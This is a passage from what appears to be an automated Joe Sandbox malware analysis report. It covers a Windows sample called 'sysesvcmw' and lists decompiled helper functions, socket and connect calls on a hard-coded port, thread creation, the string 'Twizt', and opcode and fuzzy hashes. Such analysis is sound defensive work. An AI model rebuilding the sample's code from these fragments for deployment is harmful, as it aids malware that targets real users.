                                                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(000000FF), ref: 0040B741
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(000000FF), ref: 0040B844
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Interlocked$DecrementExchangeIncrement
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2813130747-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 41846e6cfc7f0546849fed8b06db4ef19aa9dc748b52b1219feac9cfc211ae52
                                                                                                                                                                                                                                                                                    • Instruction ID: db0459fb64bb370bce4e0a30eccd781bcd80949e3aac1fb63126087b8d08ccea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41846e6cfc7f0546849fed8b06db4ef19aa9dc748b52b1219feac9cfc211ae52
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 904171B5E00208ABDB04EBA4D845BAF7778AB44308F14856DF5056B3C2E7799A41C7EE
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E004047C0(intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                                                                    				char _v5;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                                                                                                                                    				void* _t64;
                                                                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v5 = 0;
                                                                                                                                                                                                                                                                                    				EnterCriticalSection("(Z(");
                                                                                                                                                                                                                                                                                    				_t32 = E0040B210(_t41, _a12); // executed
                                                                                                                                                                                                                                                                                    				_t65 = _t64 + 4;
                                                                                                                                                                                                                                                                                    				_v12 = _t32;
                                                                                                                                                                                                                                                                                    				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                    					if( *0x4163b4 != 0) {
                                                                                                                                                                                                                                                                                    						_v16 = 0;
                                                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                                                    							__eflags = _v16 -  *0x4163b4; // 0x1
                                                                                                                                                                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    								goto L15;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t36 = _v16 * 0x110;
                                                                                                                                                                                                                                                                                    							_t42 =  *0x4163b0; // 0x1eb7da8
                                                                                                                                                                                                                                                                                    							_t54 = _v12;
                                                                                                                                                                                                                                                                                    							__eflags =  *((intOrPtr*)(_t42 + _t36 + 4)) -  *((intOrPtr*)(_t54 + 4));
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(_t42 + _t36 + 4)) ==  *((intOrPtr*)(_t54 + 4))) {
                                                                                                                                                                                                                                                                                    								_t44 = _v16 * 0x110;
                                                                                                                                                                                                                                                                                    								_t55 =  *0x4163b0; // 0x1eb7da8
                                                                                                                                                                                                                                                                                    								_t38 = _v12;
                                                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(_t55 + _t44 + 8)) -  *((intOrPtr*)(_t38 + 8));
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_t55 + _t44 + 8)) <  *((intOrPtr*)(_t38 + 8))) {
                                                                                                                                                                                                                                                                                    									_v5 = 1;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								__eflags = _a16;
                                                                                                                                                                                                                                                                                    								if(_a16 != 0) {
                                                                                                                                                                                                                                                                                    									memcpy(_a16, _v12, 0x40 << 2);
                                                                                                                                                                                                                                                                                    									_t65 = _t65 + 0xc;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t49 = _v16 + 1;
                                                                                                                                                                                                                                                                                    								__eflags = _t49;
                                                                                                                                                                                                                                                                                    								_v16 = _t49;
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_v5 = 1;
                                                                                                                                                                                                                                                                                    						if(_a16 != 0) {
                                                                                                                                                                                                                                                                                    							memcpy(_a16, _v12, 0x40 << 2);
                                                                                                                                                                                                                                                                                    							_t65 = _t65 + 0xc;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L15:
                                                                                                                                                                                                                                                                                    					E00408C70(_v12);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				LeaveCriticalSection("(Z(");
                                                                                                                                                                                                                                                                                    				return _v5;
                                                                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                                                                    0x004047c8
                                                                                                                                                                                                                                                                                    0x004047d1
                                                                                                                                                                                                                                                                                    0x004047db
                                                                                                                                                                                                                                                                                    0x004047e0
                                                                                                                                                                                                                                                                                    0x004047e3
                                                                                                                                                                                                                                                                                    0x004047ea
                                                                                                                                                                                                                                                                                    0x004047f7
                                                                                                                                                                                                                                                                                    0x00404812
                                                                                                                                                                                                                                                                                    0x00404824
                                                                                                                                                                                                                                                                                    0x00404827
                                                                                                                                                                                                                                                                                    0x0040482d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404832
                                                                                                                                                                                                                                                                                    0x00404838
                                                                                                                                                                                                                                                                                    0x0040483e
                                                                                                                                                                                                                                                                                    0x00404845
                                                                                                                                                                                                                                                                                    0x00404848
                                                                                                                                                                                                                                                                                    0x0040484f
                                                                                                                                                                                                                                                                                    0x00404855
                                                                                                                                                                                                                                                                                    0x0040485b
                                                                                                                                                                                                                                                                                    0x00404862
                                                                                                                                                                                                                                                                                    0x00404865
                                                                                                                                                                                                                                                                                    0x00404867
                                                                                                                                                                                                                                                                                    0x00404867
                                                                                                                                                                                                                                                                                    0x0040486b
                                                                                                                                                                                                                                                                                    0x0040486f
                                                                                                                                                                                                                                                                                    0x0040487c
                                                                                                                                                                                                                                                                                    0x0040487c
                                                                                                                                                                                                                                                                                    0x0040487c
                                                                                                                                                                                                                                                                                    0x0040484a
                                                                                                                                                                                                                                                                                    0x0040481e
                                                                                                                                                                                                                                                                                    0x0040481e
                                                                                                                                                                                                                                                                                    0x00404821
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404821
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404848
                                                                                                                                                                                                                                                                                    0x004047f9
                                                                                                                                                                                                                                                                                    0x004047f9
                                                                                                                                                                                                                                                                                    0x00404801
                                                                                                                                                                                                                                                                                    0x0040480e
                                                                                                                                                                                                                                                                                    0x0040480e
                                                                                                                                                                                                                                                                                    0x0040480e
                                                                                                                                                                                                                                                                                    0x00404810
                                                                                                                                                                                                                                                                                    0x00404882
                                                                                                                                                                                                                                                                                    0x00404886
                                                                                                                                                                                                                                                                                    0x0040488b
                                                                                                                                                                                                                                                                                    0x00404893
                                                                                                                                                                                                                                                                                    0x004048a1

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32((Z(,?,?,?,00000000,?), ref: 004047D1
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32((Z(,?,?), ref: 00404893
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                    • String ID: (Z(
                                                                                                                                                                                                                                                                                    • API String ID: 3168844106-3170816878
                                                                                                                                                                                                                                                                                    • Opcode ID: 7af3e9a7212a4c5a9a835c0bb542c976ae0ef7b7df221f98a6c9fe21a2051011
                                                                                                                                                                                                                                                                                    • Instruction ID: 5d85e41b99197fd03f9ec106f9c93e6151e95852763dc0d5daa1eef3e0cf8742
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7af3e9a7212a4c5a9a835c0bb542c976ae0ef7b7df221f98a6c9fe21a2051011
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03219179D0024CEBCB04DF94D5447EEBB74EB84314F15C4AADA0577391C378AA85CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                    			E00409EC0(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				char _v9;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t23 = E0040A8F0(__ecx); // executed
                                                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_a8 + 4)) = _t23;
                                                                                                                                                                                                                                                                                    				_t4 = _a8 + 0x14; // 0x1023d00
                                                                                                                                                                                                                                                                                    				 *_a8 = E00408E40(_a8 + 4,  *_t4 + 0x14);
                                                                                                                                                                                                                                                                                    				_v9 = 0;
                                                                                                                                                                                                                                                                                    				_t9 = _a8 + 0x14; // 0x1023d00
                                                                                                                                                                                                                                                                                    				_v16 =  *_t9 + 0x18;
                                                                                                                                                                                                                                                                                    				_v8 = E0040AB80( *_t9 + 0x18, "Twizt", lstrlenA("Twizt"), _a8, _v16);
                                                                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    					_v9 = _a12(_a4, _v8, _v16, _a16);
                                                                                                                                                                                                                                                                                    					E00408C70(_v8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v9;
                                                                                                                                                                                                                                                                                    			}







                                                                                                                                                                                                                                                                                    0x00409ec6
                                                                                                                                                                                                                                                                                    0x00409ece
                                                                                                                                                                                                                                                                                    0x00409ed4
                                                                                                                                                                                                                                                                                    0x00409eed
                                                                                                                                                                                                                                                                                    0x00409eef
                                                                                                                                                                                                                                                                                    0x00409ef6
                                                                                                                                                                                                                                                                                    0x00409efc
                                                                                                                                                                                                                                                                                    0x00409f20
                                                                                                                                                                                                                                                                                    0x00409f27
                                                                                                                                                                                                                                                                                    0x00409f3c
                                                                                                                                                                                                                                                                                    0x00409f43
                                                                                                                                                                                                                                                                                    0x00409f48
                                                                                                                                                                                                                                                                                    0x00409f51

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Twizt,0040BF79,0040BF79,?,?,0040BF79,00000000,0040BF79,0040BF79,00000000,00000000), ref: 00409F0C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                                                                                                                                    • String ID: Twizt$Twizt
                                                                                                                                                                                                                                                                                    • API String ID: 1659193697-16428492
                                                                                                                                                                                                                                                                                    • Opcode ID: 277335d7e8338359a91c565511ffc649c6ce38734f2e38486cdb580f35fc55b6
                                                                                                                                                                                                                                                                                    • Instruction ID: 51841e325dfe15d34157b3dfc8deab755d799cdbd1fe14e6e1da9ccb35aaee06
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 277335d7e8338359a91c565511ffc649c6ce38734f2e38486cdb580f35fc55b6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B114FB5900148BFCB04DF98D941E9EBBB5EF48304F10C0A9FD19AB342D635EA50CBA6
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 0040B623
                                                                                                                                                                                                                                                                                    • htons.WS2_32(00009E34), ref: 0040B655
                                                                                                                                                                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040B66F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409600: shutdown.WS2_32(004095ED,00000002), ref: 00409609
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409600: closesocket.WS2_32(004095ED), ref: 00409613
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: closesocketconnecthtonsshutdownsocket
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1987800339-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1c976605b0aa8376304c87d57d4217be9ecc0ed4ff7a5fcb27ef9caeac3a3a37
                                                                                                                                                                                                                                                                                    • Instruction ID: c802b0052d99b2efba98434c277248b112f68f869576d9f5ee3dd816caa1dbdc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c976605b0aa8376304c87d57d4217be9ecc0ed4ff7a5fcb27ef9caeac3a3a37
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31113C74904209EBCF14DFA4D9096AEB774EF04320F2087AAE825A73D0D7754F00979A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00405C90(void* __ecx, void* _a8, int _a12) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t12 = E00408B20(_a12 + 1);
                                                                                                                                                                                                                                                                                    				_v8 = _t12;
                                                                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    					memcpy(_v8, _a8, _a12);
                                                                                                                                                                                                                                                                                    					 *((char*)(_v8 + _a12)) = 0;
                                                                                                                                                                                                                                                                                    					_t15 = CreateThread(0, 0, E00405BF0, _v8, 0, 0); // executed
                                                                                                                                                                                                                                                                                    					return CloseHandle(_t15);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                                                    0x00405c9b
                                                                                                                                                                                                                                                                                    0x00405ca3
                                                                                                                                                                                                                                                                                    0x00405caa
                                                                                                                                                                                                                                                                                    0x00405cb8
                                                                                                                                                                                                                                                                                    0x00405cc6
                                                                                                                                                                                                                                                                                    0x00405cda
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405ce1
                                                                                                                                                                                                                                                                                    0x00405cea

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,?), ref: 00405CB8
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00405BF0,00000000,00000000,00000000), ref: 00405CDA
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405CE1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseCreateHandleThreadmemcpy
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2064604595-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2df65ca6b39dd480908712e7ed97ae493583a6de5b0987b52861d1b6c46fc4c0
                                                                                                                                                                                                                                                                                    • Instruction ID: 803d6fb9b7686d1f5cf7c0b2d1923dc136da0f816c959fa2d102c3f70f685485
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2df65ca6b39dd480908712e7ed97ae493583a6de5b0987b52861d1b6c46fc4c0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF090B1A40348FBDB00DFA4DC4AF9F7378EB48704F208469FA05A72C1D675AA10CB69
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                    			E004089C0(void* __ecx) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				signed char _t5;
                                                                                                                                                                                                                                                                                    				long _t7;
                                                                                                                                                                                                                                                                                    				signed char _t9;
                                                                                                                                                                                                                                                                                    				signed char _t10;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				if((E00408850() & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                                                                    					_t5 = HeapCreate(0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    					 *0x4163bc = _t5;
                                                                                                                                                                                                                                                                                    					if( *0x4163bc != 0) {
                                                                                                                                                                                                                                                                                    						_v8 = 2;
                                                                                                                                                                                                                                                                                    						_t9 =  *0x4163bc; // 0x1e90000
                                                                                                                                                                                                                                                                                    						__imp__HeapSetInformation(_t9, 0,  &_v8, 4); // executed
                                                                                                                                                                                                                                                                                    						_t7 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                                    						 *0x416df0 = _t7;
                                                                                                                                                                                                                                                                                    						return _t7;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t10 =  *0x4163bc; // 0x1e90000
                                                                                                                                                                                                                                                                                    					_t5 = E00408930(_t10);
                                                                                                                                                                                                                                                                                    					if((_t5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    						goto L2;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t5;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x004089ce
                                                                                                                                                                                                                                                                                    0x004089e6
                                                                                                                                                                                                                                                                                    0x004089ec
                                                                                                                                                                                                                                                                                    0x004089f2
                                                                                                                                                                                                                                                                                    0x004089fe
                                                                                                                                                                                                                                                                                    0x00408a00
                                                                                                                                                                                                                                                                                    0x00408a0f
                                                                                                                                                                                                                                                                                    0x00408a16
                                                                                                                                                                                                                                                                                    0x00408a1c
                                                                                                                                                                                                                                                                                    0x00408a22
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00408a22
                                                                                                                                                                                                                                                                                    0x004089d0
                                                                                                                                                                                                                                                                                    0x004089d0
                                                                                                                                                                                                                                                                                    0x004089d7
                                                                                                                                                                                                                                                                                    0x004089e4
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004089e4
                                                                                                                                                                                                                                                                                    0x00408a2a

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00408850: GetCurrentProcessId.KERNEL32(?,00408A6B,?,0040B05E,00000010,?,?,?,?,?,?,0040B17B), ref: 00408853
                                                                                                                                                                                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00408A77,?,0040B05E,00000010,?,?,?,?,?,?,0040B17B), ref: 004089EC
                                                                                                                                                                                                                                                                                    • HeapSetInformation.KERNEL32(01E90000,00000000,00000002,00000004), ref: 00408A16
                                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00408A1C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00408930: GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040894C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$CurrentHeap$CreateHeapsInformation
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3179415709-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a639693618199c8379fb382b7bd5192c92996d99d994ee1682bc7f8514ed8ba2
                                                                                                                                                                                                                                                                                    • Instruction ID: 696ab666e994ee3a55d98a1a93898fe7b584238ea120077bf43588b8b4778e15
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a639693618199c8379fb382b7bd5192c92996d99d994ee1682bc7f8514ed8ba2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFF05BB0644304ABD324EB61FD06BA636A9A704305F00C17EF955662D5DF79D504CF5D
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040D180(WCHAR* _a4) {
                                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_t10 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_v12 = _t10;
                                                                                                                                                                                                                                                                                    				if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_v8 = GetFileSize(_v12, 0);
                                                                                                                                                                                                                                                                                    					CloseHandle(_v12); // executed
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                                                    0x0040d186
                                                                                                                                                                                                                                                                                    0x0040d1a0
                                                                                                                                                                                                                                                                                    0x0040d1a6
                                                                                                                                                                                                                                                                                    0x0040d1ad
                                                                                                                                                                                                                                                                                    0x0040d1bb
                                                                                                                                                                                                                                                                                    0x0040d1c2
                                                                                                                                                                                                                                                                                    0x0040d1c2
                                                                                                                                                                                                                                                                                    0x0040d1ce

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(004054D0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040D1A0
                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D1B5
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040D1C2
                                                                                                                                                                                                                                                                                    Memory Dump Source
